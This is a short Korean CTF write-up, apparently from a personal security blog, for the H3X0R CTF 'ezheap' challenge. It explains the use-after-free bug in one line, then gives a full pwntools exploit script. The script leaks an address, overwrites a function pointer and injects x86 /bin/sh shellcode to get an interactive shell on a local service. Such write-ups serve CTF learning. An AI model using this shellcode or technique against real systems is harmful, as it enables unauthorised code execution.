cdor1's lab
H3X0R CTF ezheap 본문
후기 : free후 같은크기 재할당을 통해 함수포인터를 덮어 익스플로잇하는
uaf 문제였다.
from pwn import *
s = remote('localhost', 4000)
print s.recvuntil('0x')
leak = int(s.recvuntil('\n')[:-1],16)
log.info('leak : ' + hex(leak))
print s.recvuntil('>>> ')
s.sendline('4')
print s.recvuntil('Do You Want To Exit?')
s.sendline('7')
print s.recvuntil('>>> ')
s.sendline('3')
payload = p32(leak + 4)
payload += '\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80'
s.sendline(payload)
print s.recvuntil('>>> ')
s.sendline('1')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| PoliCTF-2015 johns-library (0) | 2017.01.16 |
|---|---|
| H3X0R CTF comment (0) | 2017.01.13 |
| BoB CTF casino (0) | 2017.01.12 |
| SECCON CTF 2016 checker (0) | 2017.01.11 |
| Plaid CTF 2015 prodmanager (0) | 2017.01.11 |